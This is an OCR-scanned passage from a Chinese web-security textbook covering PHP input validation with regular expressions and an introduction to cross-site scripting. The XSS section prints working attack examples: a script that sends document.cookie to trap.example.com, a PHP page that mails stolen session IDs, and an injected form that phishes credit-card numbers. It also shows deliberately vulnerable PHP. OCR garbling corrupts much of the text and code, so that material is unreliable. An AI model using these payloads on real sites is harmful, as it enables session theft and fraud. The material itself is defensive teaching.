消息 头 时 也 需要 进行 校 验 。 

















令 PHP 的 正则 表达 式 库 
利用 正则 表达 式 能 够 便利 地 实现 输入 校 验 。PHP 中 可 以 利用 的 正则 表达 函数 有 ereg、 
preg、mb_ereg3 大 类 。 其 中 ，ereg 由 于 不 是 二 进 制 安全 的 ， 因 此 在 PHP5.3 及 以 后 的 版 本 中 
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已 被 上 废弃， 而 改 用 了 preg 或 mb_ereg。preg 仪 在 字符 编码 为 UTF-8 的 情况 下 能 正常 处 理 中 文 
字符 ， 而 mb_ereg 则 适用 于 大 多 数字 符 编码 。 
通过 在 程序 的 开头 使 用 preg 或 mb_ereg 进行 包含 空 字 节 的 控制 字符 校 验 ， 就 能 够 同时 进 
行 应 用 规格 中 的 字符 种 类 校 验 和 空 字 节 校 验 。 

关于 正则 表达 式 的 详情 请 参考 PHP 的 文档 或 说 明 手 册 。 下 面 ， 我 们 通过 具体 例子 来 了 解 一 
下 PHP 中 输入 校 验 时 的 注意 点 。 

















令 使 用 正则 表达 式 检 验 输 入 值 的 实例 (1)1 ~ 5 个 字符 的 字母 数字 
下 面 的 代码 展示 了 使 用 preg_match 困 数 来 校 验 “1-5 个 字符 的 字母 数字 ”的 范例 。 





代码 清单 “/42/42-010.php 





<?php 
$p = isset($ GET['p']) ? $ GET['p'] : '' 
EEC yA =00 0 











die (' 请 输入 1-5 个 字符 长 度 的 字母 或 数字 ' ) ; 
} 


?> 





<body> 
p 的 值 为 <?php echo htmlspecialchars ($p, ENT NOQUOTES, 'UTF-8'); ?> 
</body> 











传递 给 preg_match 的 正则 表达 式 可 以 按照 图 4-7 这 样 进行 解释 。 
4-7 检验 “1 一 5 个 字符 的 字母 数字 ”的 正则 表达 式 



























































En 始 人 
'/\A [a-z0-9] {1,5} \z/ui' 
外 
个 i 修饰 符 
字符 串 的 开头 1~5 个 字符 u 修饰 符 
匹配 字母 和 数字 字符 串 的 结尾 




















其 中 ， 各 部 分 的 意思 分 别 如 下 。 


Ou 修饰 符 
在 中 文 环境 中 使 用 preg_match 函数 时 ， 无 论 检验 对 象 是 否 含有 中 文 ， 都 必须 指定 表示 字 
符 编 码 为 UTF-8 的 u 修饰 符 。 





Oi 修饰 符 
i 修饰 符 表 示 匹 配 时 不 区 分 大 小 写 。 





今 全 体 一 臻 匹配 时 使 用 \A 和 \z 
\A 代表 数据 的 开头 ，\z 代表 数据 的 结尾 。 有 时 也 会 使 用 ^ 和 $ 来 代 蔡 \A 和 \z, 但 由 





4.2 输入 处 理 与 安全 性 | 69 





于 ^ 和 $$ 代表 “ 行 的 ”开头 和 结尾 ，$ 会 匹配 换行 符 ， 所 以 当 它 们 被 用 于 匹配 数据 的 开头 和 结 
时 就 有 可 能 产生 Bug。 

图 4-8 的 脚本 中 使 用 了 ^ 和 $ 代替 \A 和 \z", 校 验 对 象 字 符 的 结尾 处 为 0a ( LF 换行 ), 能 
到 换行 符 绕 过 了 校 验 。 


图 4-8 换行 符 绕 过 了 校 验 
攻 税 http;//examplejp/42/42-011.php?p=1234%0a - Windows Internet Explorer | 
GO © | 加 http://examplejp/42/42-011.php?p=1234%0a 三 sre http://example.jp/42/42-011.php?p=1234%0a 




















席 收藏 夫 | 入 htpy/examplejp/42/42-011.php?p=1234960a | | 工具 (oO) ~ 











p 的 值 为 1234 




















[ 和] 转 住 的 部 分 就 是 字符 集合 。 在 方 括号 内 将 允许 的 字符 全 部 列举 出 来 ,或 者 使 用 [0-9] 这 
样 的 形式 来 指定 范围 。 指 定 字母 ， 可 使 用 [a-zA-2]。 指 定 字母 与 数字 ,可 使 用 [a-zA-20-9]。 
而 使 用 i 修饰 符 后 ， 只 需 在 大 写 文 字 与 小 写 文字 中 任 选 其 一 即 可 。 











信 数 量 修饰 符 
{ 和 } 围 住 的 部 分 就 是 数量 修饰 符 。{1, 5} 的 意思 是 字符 数 大 于 等 于 1 且 小 于 等 于 5。 人 允许 
为 空 (0 字符 ) 的 情况 下 指定 为 {0,5}。 


























信使 用 mb_ereg 
如 果 不 用 preg_match 而 改 用 mb_ereg 函数 ， 就 需要 将 脚本 的 开头 部 分 作 如 下 修改 。 


代码 清单 “/42/42-012.php ( 选 摘 ) 




















<?php 
// mb_regex_ encoding 在 设置 了 内 部 编码 的 情况 下 可 以 省 略 
mb_regex encoding('UTF-8'); // 只 要 在 程序 开头 设置 一 次 即 可 
$p = isset($ GET['p']) ? $ GET['p'] : ''; 
if (mb ereg('\A[a-zA-20-9] {1,5}\z', S$p) === false) { 














die (' 请 输入 1-5 个 字符 长 度 的 字母 或 数字 ') ; 
} 

















mb_regex_encoding 困 数 的 作用 为 指定 mb_ereg 函数 的 字符 编码 。 如 果 php.ini 已 经 设 
置 了 内 部 字符 编码 ， 此 步骤 可 以 省 略 。 

mb_ereg 与 preg_match 的 不 同 之 处 有 3 点 : mb_ereg 的 正则 表达 式 不 需要 用 / 括 起 来 ; 
不 使 用 u 修饰 符 ; 没 找到 匹配 项 时 返回 false。 男 外 ， 由 于 mpb_ereg 的 返回 值 为 整数 或 布尔 型 ， 


QD 本 书 支持 页 面 中 的 /42/42-011.php。 
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所 以 比较 时 应 使 用 区 分 类 型 的 === 运算 符 。 
多 使 用 正则 表达 式 检验 输入 值 的 实例 ( 2 ) 住址 栏 

住址 和 姓名 等 的 输入 框 多 数 情况 下 只 限制 字符 的 长 度 而 不 限制 字符 的 种 类 。 但 是 ， 即 使 不 限 
制 字符 种 类 ， 也 应 当 检查 是 否 有 控制 字符 混 人 ， 以 防范 空 字 节 攻 击 。 例 如 ， 下 面 脚本 的 正则 表达 
式 中 就 使 用 了 POSIX 字符 集合 “[[:^cntrl:]] 来 表示 “ 非 控制 字符 的 字符 ”。 


代码 清单 ”/42/42-013.php 




















<?php 
$addr = isset($ GET['addr']) ? $ GET['addr'] : ''; 
if (preg match('/\A[[:^cntrl:]]{1,30}\z/u', $addr) == 0) { 











die (' 请 输入 长 度 / 





\ 于 30 个 字符 的 地 址 ( 必 填 项 )。 不 能 使 用 换行 或 Tab 等 控制 字符 ' ) ; 














} 


























输入 评论 等 使 用 的 textarea 元 素 (多 行 输 入 文本 框 ) 中 允许 包含 控制 字符 中 的 换行 (有 时 也 
允许 Tab )， 这 种 情况 下 可 以 使 用 如 下 正则 表达 式 。 下 例 的 意思 是 ， 禁 止 除 换行 和 Tab 以 外 的 控 
制 字符 ， 字 符 长 度 为 1 一 400。 








preg match('/\A[\r\n\t[:*cntrl:]]{1,400}\z/u', $comment) 











专栏 : 请 注意 mb_ereg 中 的 \d 与 \w COLUMN 












































正则 表达 式 内 置 了 一 些 字 符 集合 , 如 \d 匹配 数字 , \w 匹配 英文 字母 、 数 字 和 下 划 线 。 但 是 ， 
mb_ereg 中 使 用 \d 或 \w 时 也 能 匹配 全 角 字 符 。 比 如 \q 就 能 够 匹配 全 角 数 字 ( 仅 限 Unicode )。 

虽然 全 角 数 字 也 是 数字 这 一 解释 在 个 别 情况 下 会 有 所 帮助 ， 但 是 ，Web 应 用 中 常见 的 数值 
校 验 中 是 不 允许 对 象 为 全 角 数 字 的 。 
像 这 样 ， 使 用 内 置 的 字符 集合 可 能 会 匹配 到 预想 以 外 的 结果 ， 因 此 ， 安 全 起 见 ， 建 议 使 
[a-zA-20-9_] 这 类 明确 声明 字符 集合 的 方式 。 




















































































































































































































范例 
作为 以 上 内 容 的 总 结 ， 接 下 来 我 们 来 看 一 个 PHP 脚本 范例 ， 该 脚本 的 目的 在 于 接收 URL 中 
的 查询 字符 串 name 并 将 其 显示 在 页 面 上 。 








四 POSIX 是 IEEE 规定 的 基于 Unix 操作 系统 的 共通 规格 ， 其 中 也 包含 了 正则 表达 式 的 规格 。POSIX 字符 集合 则 是 指 
POSIX 正则 表达 式 中 定义 的 字符 集合 。 
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代码 清单 ”/42/42-020.php 

















// 取得 参数 后 校 验 并 转换 字符 编码 
// 同时 执行 了 输入 值 校 验 的 函数 
// Skey : GET 参数 名 
// S$pattern : 于 验证 输入 值 的 正则 表达 式 字符 串 
// $error : 验证 输入 值 时 的 错误 消息 
// 返回 值 : 取得 的 参数 ( string ) 
function getParam($key, S$pattern, S$error) { 

$val = isset($ GETISkey]) ? $ GET [Skey] : ''; 

// 校 验 字符 编码 ( shift_JIS ) 

if (! mb check encoding($val, 'Shift JIS')) { 

die (' 字符 编码 有 误 ' ) ; 

} 

// 转换 字符 编码 ( shift_JIS 一 UTF-8) 

$val = mb convert. encoding($val, "UTF-=8',; "Shift JIS'); 

if (preg match($pattern, S$val) == 0) { 


















































die(s$error); 


} 


return S$val; 


















































} 
// 调用 取得 参数 的 函数 
Sname = getParam('name', '/\A[[:*^cntrl:]]{1,20}\z/', 
' 请 输入 长 度 小 于 20 个 字符 的 姓名 ( 必 填 项 )。 不 能 使 用 控制 字符 ' ) ; 
<body> 
姓名 为 <?php echo htmlspecialchars ($name, ENT NOQUOTES, 'UTF-8'); ?> 
</body> 














getParam 范 数 中 进行 了 读 取 字符 串 、 校 验 字 符 编码 、 转 换 字 符 编码 、 输 入 校 验 等 操作 。 和 定 
义 此 类 能 够 复 用 的 共通 方法 ， 能 够 使 后 续 的 开发 过 程 轻松 很 多 。 

范例 代码 中 也 存在 一 些 不 足 之 处 ， 比 如 错误 消息 过 于 简陋 难以 理解 等 。 这 里 笔者 希望 将 代码 
的 改善 工作 作为 习题 留 给 读者 。 











专栏 : 输入 校 验 与 框架 COLUMN 


前 面 介绍 了 在 应 用 程序 中 通过 业务 逻辑 来 进行 输入 校 验 的 方法 ， 而 在 使 用 Web 应 用 开发 框 
架 的 情况 下 ， 也 能 利用 框架 中 提供 的 输入 校 验 功 能 ， 从 而 简化 开发 流程 。 

以 微软 的 .NET Framework 为 例 ， 该 框架 提供 了 名 为 “ 校 验 控件 ”的 可 视 化 输入 校 验 功 
能 。 图 4-9 展示 了 在 Visual Web Developer 2010 中 使 用 RangeValidator 校 验 控件 的 情形 。 
RangeValidator 能 校 验 输入 值 的 类 型 与 长 度 范围 ， 可 以 看 出 本 例 中 的 输入 值 为 Integer 型 ， 长 度 
万 围 为 1 一 100 字符 。 上 有 具体 内容 请 查看 图 4-9 中 的 Type、MinimumValue、MaximumValue、 

































































\Y4 





























重 


ErrorMessage 这 些 属性 。 
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4-9 校 验 控 件 中 的 属性 设置 








asp:rangevalidator#RangeValidator1| 
1~100 罗 整数 习 让 大 力 CC Rangevalidatorl System.Web.UI.WebControls.Range > 





1~1000D 整 数值 记 入 力 UT< 龙 让 WW ^ 
> Font 

ForeColor 

Height 

MaximumValue 100 

MinimumValue 1 

SetFocusOnErrc False 

SkinID 

TabIndex 0 

Text 

ToolTip 

Type Integer 


ErrorMessage 
术 证 记 机 态 刁 之 上 口 一 儿 业 天 劲 开 页 可 二 过 、ValidationSu.… 











图 4-10 为 运行 后 的 页 面 。 











4-10 ”RangeValidator 的 运行 示例 











陋 
息 RangeValidator 示 例 - Windows Internet Explorer 叶 | 回 | 3 
GO 色 | http://localhost:45962/WebForml.aspx &d 所 回 Bing Pr 
帘 收 训 夫 ”| 看 RangeValidator 示 例 | | ; 工具 (O) ~ 














101 Button 


请 输入 1~100 范 围 内 的 整数 值 














































































































截图 是 输入 “101” 后 将 输入 焦点 移动 时 的 情形 。 通 过 JavaScript 的 检验 在 页 面 上 显示 了 “请 
输入 范围 为 1 一 100 的 整数 ”的 消息 。 这 是 在 RangeValidator 的 ErrorMessage 属性 中 设置 的 
消息 。 同 样 的 校 验 也 会 在 服务 器 端 执行 。 





























除 .NET Framework 之 外 ， 很 多 其 他 的 开发 框架 同样 也 提供 了 输入 校 验 的 功能 ， 在 实际 进行 
开发 工作 时 ， 可 根据 情况 对 其 善 加 利用 。 

















总 结 


在 Web 应 用 的 入 口 处 ,程序 会 执行 以 下 三 类 操作 ， 即 检验 输入 字符 编码 、 转 换 字 符 编码 、 
输入 校 验 。 昌 然 这 些 操作 并 非 根 本 性 的 安全 性 策略 ， 但 也 能 够 有 助 于 对 框架 和 应 用 中 潜在 的 安全 


隐患 进行 防范 。 


输入 校 验 的 依据 是 应 用 的 规格 
分 验 字 符 编 码 
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检验 包含 控制 字符 在 内 的 字符 种 类 
检验 字符 数 
实施 流程 如 下 。 
设计 阶段 将 各 个 参数 的 字符 种 类 以 及 最 大 字符 数 写 人 软件 规格 说 明 书 。 
设计 阶段 决定 输入 校 验 的 实现 方针 。 
开发 阶段 依照 设计 阶段 的 决定 实现 输入 校 验 。 
参考 : 表示 “ 非 控 制 字 符 的 字符 ”的 正则 表达 式 


作为 参考 ， 此 人 处 介绍 一 下 PHP、Perl、Java、VB.NET 中 表示 “ 非 控 制 字 符 的 字符 ”的 正则 
表达 式 。 下 面 各 例子 的 目的 都 是 确认 “输入 值 为 0 一 100 个 字符 且 不 包含 控制 字符 ”。 





© PHP (preg_match ) 
以 下 为 使 用 POSIX 字符 集合 的 例子 。 








if (preg match('/\A[[:^cntrl:]]{0,100}\z/u', $s) == 1) { 
# 输入 校 验 OK 











PHP 的 preg_match 函数 除了 使 用 POSIX 字符 集合 外 ， 还 能 使 用 Perl 风格 的 \P{cc}。 这 
种 写法 也 适用 于 Perl、Java、.NET 等 语言 。 





if (preg match('/\A\P{Cc}{0,100}\z/u', $s) == 1) { 
# 输入 校 验 OK 











© PHP (mb_ereg) 
mb_ereg 只 能 使 用 POSIX 字符 集合 。 





if (mb ereg('\A[[:^cntrl:]]{0,100}\z', $addr) !== false) { 
# 输入 校 验 OK 











© Perl 
Perl 能 使 用 \P{cc} 来 指定 控制 字符 以 外 的 字符 。 由 于 Perl 中 能 够 使 用 正则 表达 式 字 面 量 ， 
所 以 不 必 使 用 两 个 \ 来 转 义 。 








if ($s =~ /\A\P{Cc}{0,100}\z/) { 
# 输入 校 验 OK 
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Java 
Java 中 可 以 使 用 String 类 的 matches 方法 。matches 方法 匹配 规则 为 全 体 一 致 ， 所 以 正则 
表达 式 中 不 必 使 用 \A 和 \z。Java 中 正则 表达 式 的 形式 为 字符 串 ， 所 以 需要 使 用 两 个 \ 来 转 义 。 








if (s.matches("\\P{Cc}{0,100}")) { 
// 输入 校 验 OK 











© VB.NET 
.NET Framework 中 提供 了 使 用 Regex 类 进行 正则 表达 式 查询 的 功能 。VB.NET 的 字符 串 字 
面 量 中 不 需要 使 用 两 个 \ 来 转 义 。 








if Regex.IsMatch(s, "\A\P{Cc}{0,100}\z") then 
' 校 验 OK 
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参考 网 址 : ITpro: http://itpro.nikkeibp.co.jp/article/COLUMN/20090525/330611/ 
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4.3 页面 显 示 的 相关 问题 


页 面 显 示人 处 理 中 会 产生 的 安全 性 问题 有 如 下 两 项 。 

跨 站 脚本 

错误 消息 导致 的 信息 泄漏 

这 里 ,我们 将 跨 站 脚本 分 成 4.3.1 (基础 篇 ) 和 4.3.2 ( 进 阶 篇 ) 两 部 分 进行 详细 讲述 。 进 阶 
篇 将 涉及 应 用 程序 动态 生成 的 显示 内 容 中 包括 URL、JavaScript 和 CSS ( Cascading Style Sheets ) 
等 的 情况 。 而 不 涉及 动态 生成 的 内 容 的 情况 下 ， 则 只 需 彻 底 掌握 基础 篇 的 知识 即 可 。 

错误 消息 导致 的 信息 泄漏 将 在 4.3.3 节 中 介绍 。 





4.3.1 ” 跨 站 脚本 ( 基础 篇 ) 


概要 


通常 情况 下 ， 在 Web 应 用 的 网 页 中 ， 有 些 部 分 的 显示 内 容 会 依据 外 界 输入 值 而 发 生变 化 ， 
而 如 果 生 成 这 些 HTML 的 程序 中 存在 问题 ， 就 会 滋生 名 为 跨 站 脚本 ( Cross-Site Scripting ) 的 安 
全 隐患 。 跨 站 脚本 的 英语 名 称 很 长 ， 所 以 经 常 缩写 为 XSS"。 本 书 也 采用 XSS 这 一 缩写 形式 。 
Web 应 用 若 存在 XSS 漏洞 ， 就 会 有 下 列 风险 。 


用 户 的 浏览 需 中 运行 攻击 者 的 恶意 脚本 ， 从 而 导致 Cookie 信息 被 窃取 ， 用 户 身份 被 冒名 
顶替 

攻击 者 能 获得 用 户 的 权限 来 恶意 使 用 Web 应 用 的 功能 
向 用 户 显 示 伪 造 的 输入 表单 ， 通 过 钓鱼 式 攻击 穷 取 用 户 的 个 人 信息 


Web 应 用 的 网 页 上 显示 外 界 传人 参数 的 场所 不 在 少数 ， 只 要 有 一 处 存在 XSS 漏洞 ， 网 站 的 
用 户 就 会 有 被 骨 名 项 蔡 的 风险 。 

Web 应 用 中 需要 防范 XSS 漏洞 的 地 方 很 多 ， 然 而 网 站 运营 方 却 普 遍 对 此 下 忽 大 意 ， 对 实施 
防范 措施 不 够 重视 。 但 是 ， 现 实 中 XSS 攻击 是 确实 存在 的 ， 而 且 XSS 的 受害 者 也 与 日 俱 增 ， 因 
此 ， 在 Web 应 用 中 采取 防范 XSS 漏洞 的 策略 必 不 可 少 。 

防范 XSS 的 策略 为 ， 页 面 显示 时 将 HTML 中 含有 特殊 意义 的 字符 (元 字符 ) 转 义 ( Escape )。 
具体 内 容 之 后 会 进行 详 述 。 





















































四 之 所 以 不 缩写 为 CSS， 是 为 了 避免 与 Cascading Style Sheets 的 缩写 混淆 。 
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XSS 漏洞 总 览 


Web 应 用 中 生成 HTML 和 JavaScript 的 地 方 





影响 范围 
Web 应 用 全 体 


0 影响 类 型 
在 网 站 用 户 的 浏览 器 中 执行 JavaScript， 显 示 伪 造 的 网 站 内 容 


CA 影响 程度 
全 


Y 用 户 参 与 程度 
需要 一 浏览 恶意 网 站 、 点 击 邮件 内 的 附属 链接 、 浏 览 已 被 入 侵 的 网 站 等 


/ 世 \ 















































To 





= 用 双 引 号 括 起 属性 值 
转 义 HTML 中 的 特殊 字符 


























攻击 手段 与 影响 
为 了 更 好 地 理解 XSS 的 攻击 方法 与 影响 ， 首 先 让 我 们 来 看 一 下 XSS 被 恶意 使 用 的 3 种 方式 。 





窃取 Cookie 值 
通过 JavaScript 攻击 
算 改 网 页 





令 XSS 窃取 Cookie 值 
假设 以 下 PHP 脚本 是 搜索 页 面 的 一 部 分 。 该 页 面 需要 用 户 登 录 后 才能 使 用 ， 页 面 上 显示 的 


是 搜索 关键 词 。 


代码 清单 ”/43/43-001.php 


























<?php 
session start(); 
// 登录 校 验 ( 略 ) 
?> 
<body> 
检索 关键 词 :<?php echo $_GET['keyword']; ?><br> 
以 下 上 略 
</body> 











先 来 看 一 下 正常 运行 的 情况 ,假设 关键 词 为 “Haskell”"，URL 如 下 。 
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http://example.jp/43/43-001.php?keyword=Haskell 








此 时 页 面 显 示 内 容 如 下 。 
图 4-11 指定 关键 词 为 “Haskell”( 正常 情况 ) 





i 瑟 | 画 [| 多 
人 [Bhp//examplejp/43/a3-001.phpkeyword=Haskel ~ [IX sng DP- 














帘 收藏 天。 税 httpy/examplejp/43143-001.php?keyword=… 工具 (oO) ~ 


搜索 关键 字 ，Haskel 
以 下 略 




















接 下 来 是 攻击 的 例子 。 关 键 词 指定 如 下 。 





keyword=<script>alert (document .cookie)</script> 











页 面 显示 如 下 "。 
图 4-12 会 话 ID 被 读 取 


六 http://examplejp/43/43-001.php?keyword=<script>alert(document.cookie)</script.. | 己 | 回 | 器 











外 PHPSESSID=6vlmv010gsglpvjq78kotkdlm7 























如 图 所 示 ， 保 存在 Cookie 中 的 会 话 ID (PHPSESSID ) 被 显示 了 出 来 。 表 明 外 部 注入 的 
JavaScript 成 功 读 取 到 了 会 话 ID。 


0 Cookie 值 
然而 ， 能 够 显示 自己 的 会 话 ID 对 于 攻击 者 来 说 并 无 太 大 意义 ， 在 实际 的 攻击 中 ， 攻 击 者 需 
要 将 存在 路 串 的 网 站 的 用 户 引诱 至 恶意 网 站 。 以 下 就 是 恶意 网 站 的 示例 。 














代码 清单 “/43/43-900.html 





<html><body> 

商品 大 甩卖 

<br><br> 

<iframe width=320 height=100 src="http://example.jp/43/43-001. 
php?keyword=<script>window.location='http://trap.example.com/43/43-901. 




















QD IE8 默认 启用 XSS 筛选 器 的 情况 下 ， 会 阻挡 通过 XSS 执行 的 JavaScript。 若 要 在 IE8 中 显示 图 4-12 的 效果 ， 可 以 选 
择 “工具 ”菜单 的 “Internet 选项 ”一 选择 “安全 ”标签 一 点 击 “ 自 定义 级 别 ” 一 脚本 一 启用 XSS 筛选 器 一 关闭 。 实 
验 结束 后 ， 再 将 设置 改 回 。 
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php?sid='%2Bdocument .cookie;</script>"></iframe> 
</body></html> 








恶意 网 站 的 HTML 使 用 了 iframe 元 素来 显示 存在 隐患 的 网 站 的 页 面 (/43/43-001.php )， 并 对 其 
实施 XSS 攻击 了。 存在 隐患 的 网 站 的 用 户 只 要 浏览 了 该 恶意 网 站 , 浏览 器 中 iframe 里 面 的 页 面 就 
会 受到 XSS 攻击 。 


4-13 ”恶意 网 站 构造 示例 
































亚 兰 a 本 

恶意 网 页 二 一 一 显示 伪装 的 网 页 信息 击 成 功 
[Bhtepy/nrap.example. Jordh/43/43-900 ht - Windows Internet Explorer SBT | [ http/frap.example. com/|3/43-900 ht - Windows Internet Explorer [=l®l z 相 

GOD- [加 hapy 避 dp.examplecom/a3/43-900html “| 分 |x| 囊 are pr OO- | 加 httpi/trap Fxample.com/a3/43-900.html |*+| x ||[S aing pr 



































容 收 坟 夫 | 赔 htp: 四 pexample cormy43143-900.html ] IA(O)™ 请 收 夫 | 恬 htpy/traplexample.com/a3/a3-900html | IR ~ 
商品 打折 信息 。 下 商品 打折 信息 


跳 转 至 信息 收集 页 面 攻击 成 功 


PHPSESSID=6vlmv010gsglpvjq78k9tkdlm7 













































































[| 存在 隐患 的 网 页 一 信息 收集 页 面 


1. 恶意 网 站 的 iframe 中 显示 出 存在 隐患 的 网 站 

2. 存 在 隐患 的 网 站 遭受 攻击 后 ，Cookie 值 被 添加 到 URL 的 查询 字符 串 中 ， 页 面 跳 转 到 信 
息 收 集 页 面 

3. 信息 收集 页 面 将 接收 到 的 Cookie 值 通 过 邮件 发 送 给 攻击 者 






































4-13 展示 了 恶意 网 站 的 运作 方式 。 打 开 图 左 侧 的 页 面 时 ，iframe 中 会 使 用 如 下 URL 访问 
隐患 网 页 。 








http://example.jp/43/43-001.php?keyword=<script>window. 
location='http://trap.example.com/43/43-901.php?sid='%2Bdocument. 
cookie;</script> 














然后 ， 存 在 隐患 的 网 页 中 就 会 执行 如 下 JavaScript 代码 。 为 了 易于 阅读 ， 此 处 对 其 进行 了 适 
当 的 换行 。 





<SCript> 
window.location='http://trap.example.com/43/43-901.php?sid="' 
+document .cookie; 

</script> 














这 段 JavaScript 脚本 的 作用 为 ， 添加 Cookie 值 作为 URL 的 查询 字符 串 ， 并 跳 转 至 信息 收 
集 页 面 (43-091.php ) 2?。 以 下 为 收集 信息 用 的 脚本 , 它 会 将 收集 到 的 会 话 ID 发 送 给 攻击 者 的 邮箱 


中 实际 的 攻击 中 ,攻击 者 会 通过 设置 CSS 将 iframe 部 分 隐藏 ， 以 不 被 用 户 看 到 。 
@) 其 实 43-091.php 中 也 存在 XSS 漏洞 ， 但 假设 攻击 者 对 此 并 不 知情 。 
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(假定 为 wasbook@example.jp )。 


代码 清单 ”/43/43-901.php 





<?php 
mb_ language ('Japanese'); 
ssid = $ GET['sid']; 
mb_send mail('wasbook@example.jp'，' 攻击 成 功 '，' 会 话 ID:' . $sid, 
'From: cracked@trap.example.com'); 





2 

<body> 攻击 成 功 <br> 
<?php echo $sid; ?> 
</body> 














邮件 发 送 结果 如 图 4-14 所 示 。 
图 4-14 ”通过 邮件 收集 浏览 了 恶意 网 站 的 用 户 的 会 话 ID 


x 
< 上 《RN RE > 到 册 生 。 邮 人 标签 二 


攻击 成 田 二 


cracked@trap.example.com 
发 给 wasbook 2013-12-01 13:43 隐藏 信息 





外 


发 件 人 : cracked@trap.example.com<cracked@trap.example.com> 
收 件 人 : wasbook<wasbook@examplejp> 

时 间 : 2013 年 12 月 1 日 周 日 ) 13:43 

大 小 :2 KB 


会 话 ID : PHPSESSID=6vlmv0i0gs9lpvjq78k9tkdlm7 

















如 此 这 般 ， 如 果 用 户 是 在 登录 了 存在 隐患 的 网 站 之 后 浏览 的 恶意 网 页 ， 就 会 中 了 XSS 的 招 
而 使 自己 的 会 话 ID 通过 邮件 发 送 给 攻击 者 。 攻 击 者 利用 得 到 的 会 话 ID ， 就 可 以 伪装 成 其 他 用 户 
肆意 记 为 。 





多 通过 JavaScript 攻击 

在 上 面 的 例子 中 ， 攻 击 者 利用 JavaScript 读 取 到 了 用 户 的 Cookie 值 ， 然 而 ， 事 实 上 利用 
JavaScript 实施 的 攻击 却 远 不 止 如 此 。 其 中 一 个 典型 的 案例 就 是 利用 XSS 制造 的 蠕虫 病毒 。 下 表 
列举 了 专门 攻击 美国 大 型 网 站 的 蠕虫 病毒 。 


表 4-3 XSS 蠕虫 病毒 
















































































时 期 蠕虫 名 目标 网 站 主要 行为 
2005 年 10 JS/Spacehero(samy) myspace.com 为 名 为 samy 的 账户 增加 好 友 
2006 年 6 月 JS.Yamanner@m Yahoo ! 邮箱 ( 美国 版 ) 句 感染 者 的 通讯 录 中 的 邮箱 地 址 发 送 病毒 
2009 年 4 月 JS.Twettir twitter.com 将 病毒 复制 到 感染 者 的 个 人 资料 页 面 中 
2010 年 9 月 一 twitter.com 动 发 布 跳 转 至 成 人 网 站 的 信息 等 
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虽然 这 些 蠕 虫 病毒 表面 上 看 上 去 并 不 带 有 恶意 ， 但 如 果 罪 犯 有 决心 的 话 ， 就 能 够 收集 大 量 的 
用 户 个 人 信息 或 者 伪装 他 人 发 布 信息 ， 从 而 形成 潜在 的 巨大 风险 。 

另外 ， 随 着 Ajax 技术 的 风靡 ,通过 JavaScript 调用 Web 应 用 的 各 种 功能 的 程序 ( Application 
Program Interface, 缩写 为 API ) 在 网 站 中 的 分 量 正在 逐步 增加 。 由 于 API 也 能 被 恶意 用 于 实施 攻 
击 ， 因 此 ,综合 使 用 XSS 与 JavaScript 的 攻击 实施 起 来 反而 变 得 更 容易 了 。 





令 算 改 网 页 

以 上 解说 的 攻击 手段 中 ，XSS 攻击 的 对 象 网 站 仅 限 于 支持 会 员 登 录 的 网 站 。 其 实 ， 没 有 登录 
功能 的 网 站 同样 也 会 遭受 XSS 攻击 。 

4-15 是 某 新 发 布 的 手机 的 预购 网 站 。 该 网 站 由 于 存在 XSS 漏洞 ， 因 此 便 能 够 对 网 页 中 的 
HTML 元 素 进行 添加 / 更改/ 删除 , 或 者 更 改 表 单 发 送 的 目标 。 


图 4-15 某 新 款 手 机 的 预购 网 站 









































r | 
息 全 新 手机 预约 - Windows Internet Explorer 己 | 回 | 实 
GO [Bttp//examplejp/s3/a3-002.php ~|3 [x|| sng Dr 

次 收藏 夫 | 咎 人 新手 机 预约 | 工具 (o) ~ 




















网 页 脚本 的 主干 内 容 如 下 "。 由 于 该 页 面 兼任 着 输入 页 面 和 编辑 页 面 , 因 此 各 个 输入 框 都 设置 
了 初期 值 。 而 XSS 漏洞 就 存在 于 此 。 











代码 清单 ”43/43-902.php 





<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 














<html> 

<head><title> 全 新 手机 预约 </title></head> 

<body> 

<form action="" method="POST"> 

姓 名 <input size="20" name="name" value="<?php echo @$ POST['name']; ?>"><br> 


也 址 <input size="20" name="addr" value="<?php echo @$ POST['addr']; ?>"><br> 
电话 号 码 <input size="20" name="tel" value="<?php echo @$ POST['tel']; ?>"><br> 


























型 号 <input size="10" name="kind" value="<?php echo @$ POST['kind']; ?>"> 
数 量 <input size="5" name="num" value="<?php echo @$ POST['num']; ?>"> 
<bES 

<input type=submit value=" 申请 "></form> 

</body> 

</html> 











(D $_POST 变量 前 面 的 “@” 为 错误 控制 运算 符 ， 用 于 忽略 该 POST 变量 未 定义 时 发 生 的 错误 。 
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虽然 该 网 站 没有 认证 功能 ， 但 同样 能 对 其 实施 XSS 攻击 。 

以 下 HTML (43-902.html ) 为 对 “ 某 新 款 手 机 的 预约 网 站 ”进行 XSS 攻击 的 恶意 网 页 。 该 页 
面 同时 也 可 以 作为 不 使 用 JavaScript 的 XSS 攻击 的 示例 ， ns 过 样式 将 攻击 用 表单 的 提交 按 
钮 伪装 成 了 链接 的 样子 。 


代码 清单 ”43/43-902.html 































































































<html> 

<head><title> 使 用 信用 卡 预约 全 新 手机 </title></head> 
<body> 

现在 可 以 使 用 信用 卡 预 约 手机 ， 赶 紧 下 单 吧 。 

<BR> 


<form action="http://example.jp/43/43-002.php" method="POST"> 

<input name="name" type="hidden" value='"></form><form style=top:5px;left:5px;positi 
on:absolute;z-index:99;background-color:white action=http://trap.example.com/43/43- 
903 .php method=POST> 请 使 用 信用 卡 支 付 预购 定金 <bz> 姓 名 <input size=20 name=name><br> 
地 址 <input size=20 name=addr><br> 电话 号 码 <input size=20 name=tel><br> 型 TOO 





















































size=10 name=kind> 数量 <input size=5 name=num><br> 信用 卡号 <input size=16 name=card> 























































































































有 效 期 限 <input size=5 name=thru><br><input value= 申请 type=submit><br><br><br><br> 
bem > 注入 的 HTML 
<input style="cursor:pointer;text-decoration:underline;color:blue; 
border:none; 
background:transparent;font-size:100%;" type="submit" value=" 手机 预约 中 心 "> 
OS | 包装 成 链接 的 按 包 
</body> 
</html> 
下 图 为 恶意 网 页 的 页 面 。 
4-16 恶意 网 页 
[给 使用 信用 卡巴 的 全 新 手机 - Windows Internet Explorer eel) 
ODO- | 回 httpi//trap.example.com/43/43-902html ~|| X ||S are pr- 
资 收 夫 | 大全 用 信用 上 的 全 新手 机 | ; IRO* 
人 
| 伪装 成 链接 的 按钮 
户 点 击 伪装 成 链接 的 按钮 后 ， 如 下 HTML 就 会 被 生成 在 攻击 对 象 网 站 上 。 
<FORM action="" METHOD=POST> 厂 使 原先 的 form 元 素 结束 
